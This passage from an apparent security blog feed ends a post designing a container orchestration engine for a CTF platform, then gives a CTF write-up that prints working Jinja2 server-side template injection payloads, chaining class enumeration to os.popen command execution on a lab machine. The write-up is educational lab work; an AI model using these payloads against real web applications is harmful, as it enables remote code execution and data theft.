<li><p>SSL/TLS termination for all subdomains</p>
</li>
<li><p>Support for SSH, HTTP connections</p>
</li>
</ul>
</li>
<li><p><strong>Cloud-Agnostic Architecture</strong></p>
<ul>
<li><p>Should work on AWS, Azure, GCP, or bare metal</p>
</li>
<li><p>No vendor lock-in via proprietary services</p>
</li>
<li><p>Portable enough to open-source and let others deploy</p>
</li>
</ul>
</li>
<li><p><strong>Observable &amp; Debuggable</strong></p>
<ul>
<li><p>Comprehensive logging and tracing</p>
</li>
<li><p>Real-time metrics (Prometheus + Grafana)</p>
</li>
<li><p>Easy visibility into what's happening under the hood</p>
</li>
</ul>
</li>
<li><p><strong>Cost-Effective</strong></p>
<ul>
<li><p>Run on EC2 instances within AWS free tier</p>
</li>
<li><p>Efficient resource utilization</p>
</li>
<li><p>No per-container pricing overheads</p>
</li>
</ul>
</li>
</ol>
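<p>To make the routing requirement concrete, here is a minimal sketch of how the unique subdomain could be derived. The helper name and the truncation length are my assumptions, not Poseidon’s actual implementation; note that DNS caps a single label at 63 characters, so the full 64-character SHA-256 hex digest has to be shortened anyway.</p>

```python
import hashlib

def instance_subdomain(instance_id: str, base_domain: str = "orcactf.app") -> str:
    """Derive a stable, hard-to-guess subdomain for one container instance."""
    digest = hashlib.sha256(instance_id.encode()).hexdigest()
    # A DNS label may be at most 63 characters, so the 64-char hex digest
    # is truncated; 16 hex chars (64 bits) still make guessing another
    # user's URL impractical.
    return f"{digest[:16]}.{base_domain}"

print(instance_subdomain("user42:challenge7"))
```

<p>Because the digest is deterministic, the master can recompute the hostname from the instance ID at any time instead of storing it.</p>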
<p>Quick note: I'm building this in parallel with writing about it. Some details will evolve as we discover what works.</p>
<h3 id="heading-architecture-philosophy-simplicity-over-features">Architecture Philosophy: Simplicity over features</h3>
<p>Poseidon follows a <strong>two-process</strong> model:</p>
<ul>
<li><p><strong>Master process:</strong> Runs alongside OrcaCTF’s other backend services. Handles API requests, maintains state in Redis, schedules containers across workers and monitors health.</p>
</li>
<li><p><strong>Worker process:</strong> Runs on one or more EC2 instances. Receives commands from the master, spins up Docker containers, adds helpful labels to help in routing and reports status back.</p>
</li>
</ul>
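<p>As a rough sketch of the hand-off between the two processes, the master→worker work request can be a single small message. The field names below are illustrative assumptions, not Poseidon’s actual wire format:</p>

```python
import json
from dataclasses import dataclass, asdict

@dataclass
class WorkRequest:
    """What the master tells a worker to launch one instance (hypothetical schema)."""
    instance_id: str
    image: str           # challenge container image
    user_id: str
    cpu_limit: float     # cores
    mem_limit_mb: int
    timeout_s: int       # lifetime before automatic cleanup

req = WorkRequest("inst-001", "orcactf/web-chall:latest", "user42", 0.5, 256, 3600)
wire = json.dumps(asdict(req))               # master -> worker over the wire
received = WorkRequest(**json.loads(wire))   # worker reconstructs the request
assert received == req
```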
<p>The design is intentionally minimal. We’re not trying to compete with Kubernetes. We’re solving a specific problem with the simplest architecture that works.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761533191284/1b3f8880-8118-43ae-acf9-879b87914208.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-the-user-experience">The User Experience:</h3>
<p>Let’s walk through the expected UX when a student wants to run a challenge:</p>
<ul>
<li><strong>Phase 1: Request ( User → Backend )</strong></li>
</ul>
<ol>
<li><p><strong>User clicks "Start Challenge"</strong> on the OrcaCTF frontend</p>
</li>
<li><p><strong>Frontend calls backend API</strong>, which validates the user's token and permissions</p>
</li>
<li><p><strong>Backend returns "pending"</strong>, triggering a loading spinner</p>
</li>
</ol>
<ul>
<li><strong>Phase 2: Orchestration ( Backend → Poseidon )</strong></li>
</ul>
<ol>
<li><p><strong>Backend calls Poseidon Master</strong>, passing challenge details and user ID</p>
</li>
<li><p><strong>Master verifies</strong> the user doesn't have an active instance running</p>
</li>
<li><p><strong>Master selects a worker</strong> (load balancing strategy TBD) and sends a work request</p>
</li>
<li><p><strong>Worker spins up the Docker container</strong>, setting labels for routing</p>
</li>
<li><p><strong>Worker performs health check</strong>, then reports success to Master</p>
</li>
<li><p><strong>Master updates Redis state</strong> with the container's unique subdomain</p>
</li>
</ol>
<ul>
<li><strong>Phase 3: Connection and cleanup ( User → Container )</strong></li>
</ul>
<ol>
<li><p><strong>Frontend polls backend</strong> until status changes to "ready"</p>
</li>
<li><p><strong>User receives their unique URL</strong>: <a target="_blank" href="https://a3f4b92c8d...orcactf.app"><code>a3f4b92c8d...orcactf.app</code></a></p>
</li>
<li><p><strong>Traffic</strong> is routed to the specific container based on subdomain</p>
</li>
<li><p><strong>After timeout expires</strong> (or user terminates early), container is cleaned up</p>
</li>
</ol>
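<p>The poll-until-ready loop and the timeout cleanup in the flow above can be sketched with a tiny in-memory state table. Poseidon keeps this state in Redis; the dict layout and function names here are illustrative only:</p>

```python
import time

# instance_id -> {"status", "url", "expires_at"}; Redis in the real system
instances: dict[str, dict] = {}

def start(instance_id: str, url: str, ttl_s: int) -> None:
    """Called when the master accepts a request; container not yet healthy."""
    instances[instance_id] = {"status": "pending", "url": url,
                              "expires_at": time.time() + ttl_s}

def mark_ready(instance_id: str) -> None:
    """Called after the worker's health check succeeds."""
    instances[instance_id]["status"] = "ready"

def poll(instance_id: str) -> dict:
    """What the frontend sees; the URL is revealed only once ready."""
    inst = instances[instance_id]
    if time.time() >= inst["expires_at"]:
        inst["status"] = "expired"   # real cleanup would tear down the container
    return {"status": inst["status"],
            "url": inst["url"] if inst["status"] == "ready" else None}

start("inst-001", "a3f4b92c8d.orcactf.app", ttl_s=3600)
print(poll("inst-001"))   # {'status': 'pending', 'url': None}
mark_ready("inst-001")
print(poll("inst-001"))   # {'status': 'ready', 'url': 'a3f4b92c8d.orcactf.app'}
```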
<p>All of this happens quickly, with zero manual intervention.</p>
<h3 id="heading-why-open-source">Why Open-Source?</h3>
<p>Poseidon isn’t just a course project; it’s designed to be a reusable module. We will be open-sourcing it because every university, club, or small company that wants to host an interactive lab shouldn’t have to reinvent the wheel.</p>
<h2 id="heading-what-about-existing-platforms-like-ctfd">What about existing platforms like CTFd?</h2>
<p>If you’ve been in the CTF space, you’re likely thinking of platforms like CTFd and its <code>ctfd-whale</code> plugin. These are fantastic, all-in-one solutions for running a complete competition.</p>
<p>However, the dynamic container components are often just that: plugins, tightly coupled to the main platform. They solve the problem for <em>CTFd</em>.</p>
<p>My goal for this project is different; I wanted to build a <strong>decoupled, general-purpose orchestration engine (Poseidon)</strong> that could be used with <em>any</em> platform, whether it’s our OrcaCTF, a custom-built site, or even non-CTF uses like educational sandboxes or on-demand coding labs.</p>
<p>Poseidon is designed to be the engine, not the entire car. This <strong>separation of concerns</strong> is a core part of our design philosophy.</p>
<hr />
<p>Follow along as I dive into:</p>
<ul>
<li><p>The master process architecture and API design.</p>
</li>
<li><p>Dynamic subdomain routing.</p>
</li>
<li><p>Worker process and Docker SDK integration</p>
</li>
<li><p>Observability with Prometheus and Grafana</p>
</li>
<li><p>Deployment, auto-scaling and lessons learned</p>
</li>
<li><p>Security details like container isolation strategies</p>
</li>
</ul>
<p>By the end, we’ll have a fully functional orchestration engine, a CTF platform and a deep understanding of how distributed systems work under the hood.</p>
<p>The ocean is deep. Let’s see how deep Poseidon can go.</p>
<hr />
<p><em>This is Part 1 of the “<strong>Building Poseidon</strong>” series. Follow along as we build a custom container orchestration engine from scratch.</em></p>
<h2 id="heading-a-note-on-terminology">A Note on Terminology</h2>
<p>Throughout this series, I use "I" when discussing Poseidon's architecture and implementation because I'm building this orchestration engine independently as my contribution to our team's larger OrcaCTF platform.</p>
<p>My teammates are handling other critical pieces: <a target="_blank" href="https://www.linkedin.com/in/piyush-sahu-a696731bb/">Piyush</a> is designing the CTF challenges themselves, while <a target="_blank" href="https://www.linkedin.com/in/lakshya-samay-singh-18320b286/">Lakshya</a> and <a target="_blank" href="https://www.linkedin.com/in/samanyu-raina-b31866318/">Samanyu</a> are building the frontend and integrating scoring systems. Poseidon is the infrastructure layer that makes those challenges accessible in isolated, on-demand environments.</p>
<p>This series documents my specific journey building that infrastructure: the decisions I made, the problems I hit, and the solutions I found.</p>
]]></content:encoded></item><item><title><![CDATA[Terrier CTF [Part 1]: Network Reconnaissance to SSTI: The Methodology Beneath the Exploit]]></title><description><![CDATA[Step 0: Network Address Discovery
The Terrier CTF Boot2Root machine presented an interesting challenge from the start: identifying the machine’s IP address on the local network. While this might seem quite straightforward in theory, the practical rea...]]></description><link>https://blog.realrudrap.dev/terrier-ctf-part-1-methodology-beneath-exploit</link><guid isPermaLink="true">https://blog.realrudrap.dev/terrier-ctf-part-1-methodology-beneath-exploit</guid><category><![CDATA[CTF Writeup]]></category><category><![CDATA[CTF]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 20 Oct 2025 05:30:40 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760333413720/a5955db5-f349-4ffb-b1c1-25a052b8c4c4.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-step-0-network-address-discovery">Step 0: Network Address Discovery</h2>
<p>The Terrier CTF Boot2Root machine presented an interesting challenge from the start: identifying the machine’s IP address on the local network. While this might seem quite straightforward in theory, the practical reality of VM networking configurations often introduces unexpected complexity which is worth documenting.</p>
<p>Most Boot2Root VMs do us a favor and print their IP address to the console when they boot. Without this convenience, we need a more systematic approach to network discovery. I’ll demonstrate the approach I used with VMware Workstation Pro on my Ubuntu machine.</p>
<p>First, set the VM’s networking mode to NAT so that both machines sit on the same virtual network segment and can reach each other. Then, in the Advanced settings menu of the network adapter dialog, record the VM’s MAC address.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758773359618/d4fde2bc-21c9-4a35-ad71-7447bdab9d7e.png" alt class="image--center mx-auto" /></p>
<p>Running the <code>arp -a</code> command in the shell then lists the IP addresses, along with their associated physical (MAC) addresses, that the host has recently communicated with.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758773456323/080a2570-cbdb-4cb5-a460-ad4959ff9092.png" alt class="image--center mx-auto" /></p>
<p>Without console IP disclosure, three discovery vectors exist: ARP cache inspection (fast, requires the same subnet), an nmap subnet sweep (thorough, time-intensive), or DHCP lease examination (requires hypervisor access). Since the ARP cache records the IP and MAC addresses the system has recently communicated with on the local network, it narrowed the search to two candidates instead of 254, the optimal effort-to-information ratio.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Documentation note: Screenshots in this series span multiple testing sessions, so you may notice the target IP address changes between sections. This reflects the dynamic nature of DHCP in virtualized environments and doesn't affect the methodology demonstrated.</div>
</div>

<h2 id="heading-step-1-reconnaissance">Step 1: Reconnaissance</h2>
<p>Now that we have the IP address, I proceeded with a standard nmap scan to identify open ports. The scan revealed ports 22 (SSH) and 5000 (HTTP) were accessible.</p>
<p>The presence of password-based authentication on SSH makes it a candidate attack vector, and opening port 5000 in a web browser reveals a static web page titled R&amp;D portal.</p>
<h3 id="heading-ssh-exploit">SSH exploit:</h3>
<p>SSH authentication without username enumeration or organizational context is, at best, brute force. That approach is statistically futile in CTF environments, which are designed around exploitation rather than guessing. Port 5000 suggests custom application development ( an HTTP service on a non-standard port ), indicating a higher probability of implementation vulnerabilities than in a hardened SSH daemon.</p>
<h3 id="heading-web-page-exploit">Web page exploit:</h3>
<p>The homepage served on port 5000 appeared completely static; buttons were non-functional, no dynamic content was visible, and no obvious navigation paths existed. This warranted directory enumeration using <code>gobuster</code> with the DirBuster wordlist from <a target="_blank" href="https://github.com/danielmiessler/SecLists/">SecLists</a>, which discovered a <code>/page</code> endpoint containing a text input field with greeting functionality.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758807031244/05872a9a-781a-4315-8a54-49a5db2d1888.png" alt class="image--center mx-auto" /></p>
<p>The greeting mechanism suggested potential Server-Side Template Injection. Arithmetic evaluation (<code>{{7*7}}</code> → 49) provides unambiguous confirmation: if the server returns ‘Hello 49!’, template processing occurred server-side, whereas string operations could merely reflect client-side JavaScript. Arithmetic offers binary clarity; either the template executed, or it didn’t.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text"><strong>SSTI ( Server Side Template Injection ) </strong>occurs when web applications unsafely embed user input directly into template engines (Jinja2, Twig etc) allowing attackers to inject malicious template directives which execute as server side code. Read more <a target="_self" href="https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection">here</a></div>
</div>

<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758806696119/8d748efc-e89f-4cf2-be1c-43b9a3732479.png" alt class="image--center mx-auto" /></p>
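<p>The confirmation step is easy to reproduce locally (this requires the <code>jinja2</code> package). The snippet below shows the vulnerable pattern, user input concatenated into the template source, and why <code>{{7*7}}</code> rendering as 49 proves server-side evaluation:</p>

```python
from jinja2 import Template

user_input = "{{7*7}}"
# VULNERABLE: user input becomes part of the template source itself,
# so Jinja2 evaluates any {{ ... }} expression the user supplies.
vulnerable = Template("Hello " + user_input + "!").render()
# SAFE: user input passed as data is rendered verbatim.
safe = Template("Hello {{ name }}!").render(name=user_input)

print(vulnerable)  # Hello 49!
print(safe)        # Hello {{7*7}}!
```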
<p>As a standard practice, I tried to enumerate the available classes using the payload <code>{{''.__class__.__mro__[1].__subclasses__()}}</code>. Effectively, this payload walks from the empty string up to the base <code>object</code> class via <code>__mro__</code> (the method resolution order, which exposes a class’s parents), and then <code>__subclasses__()</code> enumerates every class currently loaded in the interpreter, some of which may be used to set up a reverse shell.</p>
<p>Upon running the payload, a long list of empty entries along with a singular class name was returned. It looked something like <code>[, , , , , , , , ,…..,typing.Any, , , , …..]</code> (the browser swallowed each <code>&lt;class '…'&gt;</code> repr as an HTML tag). To optimize the effort, I searched for the <code>_wrap_close</code> class, which helps in <a target="_blank" href="https://agrohacksstuff.io/posts/os-commands-with-python/">gaining access to the OS module</a>. <code>_wrap_close</code> wraps the file-like object returned by <code>os.popen</code>, and critically, its <code>__init__.__globals__</code> dictionary is the namespace of the <code>os</code> module itself, which references system modules like <code>sys</code> and the functions needed for OS-level operations. It is a reliable, well-documented path from the template context to OS-level execution, consistently available across Python versions.</p>
<p>The payload used was <code>{% for sc in ''.__class__.__mro__[1].__subclasses__() %}{% if sc.__name__ == '_wrap_close' %}{{ loop.index0 }}{% endif %}{% endfor %}</code></p>
<p>Running this payload is expected to return the index of the <code>_wrap_close</code> class, and sure enough, the number 140 was returned.</p>
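<p>You can reproduce the same enumeration outside the target in a local Python shell. The index (140 on the target) varies with the interpreter version and which modules happen to be imported:</p>

```python
# The same traversal the payload performs, written as plain Python.
subclasses = ''.__class__.__mro__[1].__subclasses__()

# os is imported by virtually every Python process, so its private
# _wrap_close class (which wraps the pipe object returned by os.popen)
# reliably appears among object's subclasses.
idx = next(i for i, cls in enumerate(subclasses)
           if cls.__name__ == '_wrap_close')
print(idx)  # 140 on the target; differs per interpreter
```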
<p>The next step is accessing the <code>os</code> module from here, so I first tried this payload: <code>{{ ''.__class__.__mro__[1].__subclasses__()[140].__init__.__globals__['os'].listdir() }}</code>. This payload tries to reach an <code>os</code> entry in the <code>__globals__</code> dictionary of the class’s <code>__init__</code> method; <code>os.listdir()</code> is a basic function which lists the files in the current directory.</p>
<p>The direct <code>__globals__['os']</code> approach returned HTTP 500, indicating either namespace limitations or filtering. Since <code>__builtins__</code> provides Python's core import machinery and typically exists in all execution contexts, pivoting to dynamic import via <code>__import__</code> bypasses potential restrictions on pre-imported modules. I tried the payload <code>{{ ''.__class__.__mro__[1].__subclasses__()[140].__init__.__globals__['__builtins__']['__import__']('os').popen('ls -la').read() }}</code></p>
<p>The payload finally succeeded, and the output shows the contents of the application’s working directory, owned by the <code>www-data</code> user, a common service account used to serve web content. One of the files, <code>F14@_0n3.txt</code>, stands out in particular and may hold the first flag. <code>app.py</code> is probably the application’s entry point; reading it could reveal more vulnerabilities or logic flaws.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759742744923/57417c0d-5f22-4fc2-a6c3-19d3ecd06f6a.png" alt="Screenshot of the directory listing returned by the payload" class="image--center mx-auto" /></p>
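<p>The full chain is also reproducible locally. Note that in any module other than <code>__main__</code>, CPython exposes <code>__builtins__</code> as a plain dict, which is why the payload indexes it with a string key; a harmless <code>echo</code> stands in for the real <code>ls -la</code> below:</p>

```python
subclasses = ''.__class__.__mro__[1].__subclasses__()
wrap_close = next(c for c in subclasses if c.__name__ == '_wrap_close')

g = wrap_close.__init__.__globals__       # the os module's own namespace
builtins_ns = g['__builtins__']           # dict here, since os is not __main__
if not isinstance(builtins_ns, dict):     # defensive: __main__ gets the module
    builtins_ns = vars(builtins_ns)

os_mod = builtins_ns['__import__']('os')  # dynamic import, as in the payload
print(os_mod.popen('echo pwned').read())  # pwned
```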
<p>Slightly modifying the payload to read the <code>F14@_0n3.txt</code> file instead of listing the directory structure reveals the first flag to us.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759742979524/ffa60fd9-b58d-417b-ae56-5f2607d00946.png" alt class="image--center mx-auto" /></p>
<p>The first flag is secured, but <code>www-data</code> access is merely a foothold, not privilege. The SSTI vulnerability that gave us file-reading capabilities can offer something far more valuable: arbitrary command execution, a common way of establishing a presence on the target.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Next in series: <strong>Terrier CTF [Part 2]: PCAP Dissection: Carving Secrets from Captured Packets</strong></div>
</div>

<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Shout out to my friend, <a target="_self" href="https://www.linkedin.com/in/abhijeet-somashila/">Abhijeet</a> for the awesome cover image he designed!</div>
</div>]]></content:encoded></item></channel></rss>